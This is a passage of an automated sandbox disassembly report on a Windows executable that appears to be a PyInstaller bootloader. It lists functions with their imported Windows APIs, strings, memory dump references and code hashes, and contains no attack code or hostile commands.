SetLastError.KERNEL32(?,?,?,00007FF72B8E4F11,?,?,?,?,00007FF72B8EA48A,?,?,?,?,00007FF72B8E718F), ref: 00007FF72B8EB377

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction ID: 7dd93b0f0dd6dec08d94767eb59df598974f52cb0e48a81d7a46474b68c4072d
Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction Fuzzy Hash: 69112F20E0C68281F594B7A95D9113DE1C6DF44BB0F944734F83E46AF6DE3CB4214B60

Function 00007FF72B8D2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF72B8D1B6A), ref: 00007FF72B8D295E

Strings

Error [ANSI Fallback], xrefs: 00007FF72B8D29FF
Error, xrefs: 00007FF72B8D2A0E
%s: %s, xrefs: 00007FF72B8D29E8
[PYI-%d:ERROR] , xrefs: 00007FF72B8D2966

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 715b062f248581d6f60c144e1ece92f61f21294a3be198ff093797621e0137dc
Instruction ID: 33aaa48c0c91ebb6dfbbba63d980213a5a7fc2a835c8d297aef11ee6c8bdf438
Opcode Fuzzy Hash: 715b062f248581d6f60c144e1ece92f61f21294a3be198ff093797621e0137dc
Instruction Fuzzy Hash: C331DB22B1868552E710BB69AC416F7A295FF887D4FC00132FE8D43765DF3CD5568B50

Function 00007FF72B8D2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF72B8D23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF72B8D248E
DeleteObject.GDI32 ref: 00007FF72B8D24C1
DestroyIcon.USER32 ref: 00007FF72B8D24D3

Strings

Unhandled exception in script, xrefs: 00007FF72B8D23F8

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction ID: e25e8fcfb432db3032e6a5bc61b84787809d64111eb3d8b05a55e5655311b60d
Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction Fuzzy Hash: B4316072A19A8285EB20FF65EC552F9A360FF88784FC40135EA4D4BB69DF3CD1108B50

Function 00007FF72B8D2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF72B8D918F,?,00007FF72B8D3C55), ref: 00007FF72B8D2BA0
MessageBoxW.USER32 ref: 00007FF72B8D2C2A

Strings

Warning, xrefs: 00007FF72B8D2C1D
WARNING, xrefs: 00007FF72B8D2BAF
[PYI-%d:%ls] , xrefs: 00007FF72B8D2BA8

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: 71273d836411571436c019b95e5ad3107ae263c804c6a16fc89bdfd6ac682109
Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: CA21B762718B4192E710AB68F8447EAB364FB88780FC04136EE8D57769DF3CD265CB90

Function 00007FF72B8D2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF72B8D1B99), ref: 00007FF72B8D2760

Strings

Error [ANSI Fallback], xrefs: 00007FF72B8D27CF
ERROR, xrefs: 00007FF72B8D276F
Error, xrefs: 00007FF72B8D27DE
[PYI-%d:%s] , xrefs: 00007FF72B8D2768

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 619c0e37f1add520f3e0483585ff8f83f384ea80f903cb0ff1f5e0893061d9a2
Instruction ID: fc655f3a984e4cc5569e066657e27bd404062653d72a00d4e79cba1335422aee
Opcode Fuzzy Hash: 619c0e37f1add520f3e0483585ff8f83f384ea80f903cb0ff1f5e0893061d9a2
Instruction Fuzzy Hash: 53218672A1878252E710AB65F8417E6A394FF88384FC40136FE8C53669DF7CD1558B90

Function 00007FF72B8E9A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF72B8E9AAD
GetProcAddress.KERNEL32 ref: 00007FF72B8E9AC3
FreeLibrary.KERNEL32 ref: 00007FF72B8E9AEA

Strings

mscoree.dll, xrefs: 00007FF72B8E9AA4
CorExitProcess, xrefs: 00007FF72B8E9ABC

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: e7dfc1446436b434f69b4257e862406d958fe4680787e7309bb4541aff1b9f78
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: 10F06261B0970681EB10AB6CEC8477AA360EF95761FD40635D6AE461F4DF7CE094CBA0

Function 00007FF72B8F9368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF72B8F9390
_set_statfp.LIBCMT ref: 00007FF72B8F93AB
_set_statfp.LIBCMT ref: 00007FF72B8F93C7
_set_statfp.LIBCMT ref: 00007FF72B8F9403

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 86662515fef83e8067973afb840218032993b2e678d8b732adafa7eabb9124a8
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 0D118622D5CA0342F668315DEC913799050EFB9368EC41634EB6E166F6CE6CF46149A0

Function 00007FF72B8EB390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF72B8EA5A3,?,?,00000000,00007FF72B8EA83E,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EB3AF
FlsSetValue.KERNEL32(?,?,?,00007FF72B8EA5A3,?,?,00000000,00007FF72B8EA83E,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EB3CE
FlsSetValue.KERNEL32(?,?,?,00007FF72B8EA5A3,?,?,00000000,00007FF72B8EA83E,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EB3F6
FlsSetValue.KERNEL32(?,?,?,00007FF72B8EA5A3,?,?,00000000,00007FF72B8EA83E,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EB407
FlsSetValue.KERNEL32(?,?,?,00007FF72B8EA5A3,?,?,00000000,00007FF72B8EA83E,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EB418

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction ID: 9c2bcc81fad4e9e143f834db83f79e7ef9ffbeafd5c977b2feb725a144c26812
Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction Fuzzy Hash: 7C113020E0C68281F994B7AD5D91179A181DF447B0FC88734F97D46AF6DE3CB4614BB1

Function 00007FF72B8EB224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF72B8EB235
FlsSetValue.KERNEL32 ref: 00007FF72B8EB254
FlsSetValue.KERNEL32 ref: 00007FF72B8EB27C
FlsSetValue.KERNEL32 ref: 00007FF72B8EB28D
FlsSetValue.KERNEL32 ref: 00007FF72B8EB29E

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction ID: 88f1864a2d05e61338ca521d7423f8f1d1d4686fa595a605810bd861c8364a1b
Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction Fuzzy Hash: DA11C820E0D68781F998B2A94C91179A181CF45770F948B34F93D4A6F2DE3CB8624FB1

Function 00007FF72B8E5FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E5FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E6106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E61BC

Strings

verbose, xrefs: 00007FF72B8E5FB0

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 09e5629e392cd5cb505caf64b4db7816cc877186c9c1e02955734397f286f18b
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: E691C232A0868681F761AEA8DC5037DB791EB40B94FC44136FA5D473E7DE3CE4258BA1

Function 00007FF72B8EFBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8EFEA7

Part of subcall function 00007FF72B8E7A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E7A59

Strings

UTF-16LEUNICODE, xrefs: 00007FF72B8EFE45
ccs, xrefs: 00007FF72B8EFDE2
UTF-8, xrefs: 00007FF72B8EFE26

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 4e49bebfe95fc6cef8ff843a9ebeb1a11cfff322ad80b036607b6a543e333378
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: 2E81C772E0C1C385F7647FAD8900278BAA0EB15B44FD54035EA0D972B5DB2DF9219FA1

Function 00007FF72B8DD648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF72B8DD673
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF72B8DD70A
RtlUnwindEx.KERNEL32 ref: 00007FF72B8DD764

Strings

csm, xrefs: 00007FF72B8DD6F1

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: b9ba2a939700982c240979d454e32c1e7b005d028cadfdb5f512aef57cefe1c0
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: C151C132B19603CADB54AB2DD804638B791EB45B88FD08132EA5D47764EF3CE861CB90

Function 00007FF72B8DF288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF72B8DF2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF72B8DF398

Strings

csm, xrefs: 00007FF72B8DF3EA
csm, xrefs: 00007FF72B8DF2D2

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 90b24a8e029d1a2c1797cb6916da6ff2096a10661c5fcd9286cd170d62d0b880
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: BE51933260828386EB64AF39D884268B791FB55B98FD44137DA4C47BA5CF3CE460DF91

Function 00007FF72B8DEED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF72B8DEF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF72B8DEF83

Strings

RCC, xrefs: 00007FF72B8DEF53
MOC, xrefs: 00007FF72B8DEF4B

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: 8c216d8d2cd4996ecf3d320dcb378c7ce33d23b7fcdd028aec225f2a42475322
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: 71618532908BC685DB719B29E8407A9F7A0FB85794F844626EB9C03765DF7CD1A0CF50

Function 00007FF72B8D7E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF72B8D352C,?,00000000,00007FF72B8D3F1B), ref: 00007FF72B8D7F32

Strings

\, xrefs: 00007FF72B8D7E97
%s%c, xrefs: 00007FF72B8D7EA4
%.*s, xrefs: 00007FF72B8D7EEB

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction ID: 7179cdc1dff43e778eecce3af55319de99ee307afeafa2d496bee81a6a01e636
Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction Fuzzy Hash: FB31D871619AC245EA21AB39EC107AAA354FF84BE0FC40232EA6D477D9DE3CD651CF50

Function 00007FF72B8D2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF72B8D28EA

Strings

ERROR, xrefs: 00007FF72B8D286F
Error, xrefs: 00007FF72B8D28DD
[PYI-%d:%ls] , xrefs: 00007FF72B8D2868

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: 4341f5ca30738c58a9179f8754f28744f15267ab1ccdfc81ff0c8991d3a40b11
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: 4B21A662B18B4191E710AB68F8447EAB364FB88780FC04136EE8D57665DF3CD155CB90

Function 00007FF72B8EC5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF72B8EC61F
WriteFile.KERNEL32 ref: 00007FF72B8EC8E7
WriteFile.KERNEL32 ref: 00007FF72B8EC92D
GetLastError.KERNEL32 ref: 00007FF72B8EC9E3

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

